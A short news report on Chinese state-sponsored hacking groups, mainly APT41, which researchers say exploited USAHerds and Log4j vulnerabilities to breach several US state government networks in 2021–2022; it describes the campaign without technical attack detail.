Chinese hacking groups target US and European governments
Three separate Chinese state-sponsored advanced persistent threat groups have been observed targeting victims, including U.S. state governments, European diplomatic entities and Gmail accounts linked to the U.S. government.
The first group, APT41, also known as Wicked Panda and Winti, is believed by researchers at Mandiant Inc. to have successfully compromised at least six U.S. state government networks. The APT did so by exploiting vulnerable internet-facing web applications, including using zero-day vulnerabilities in the USAHerds application and Apache Log4j.
The campaign by APT41 ran between May 2021 and February 2022. While Chinese state-sponsored actors targeting networks in the west is not new, the researchers note that one remarkable aspect is how quickly they act to exploit vulnerabilities when they become known. In the case of the now-infamous Log4j vulnerability, the Chinese hackers were exploiting the vulnerability within hours of it being disclosed. The exploitation of the initial Log4j vulnerability – there ended up being multiple vulnerabilities, directly led to the compromise of two U.S. state government networks as well as other targets in insurance and telecoms.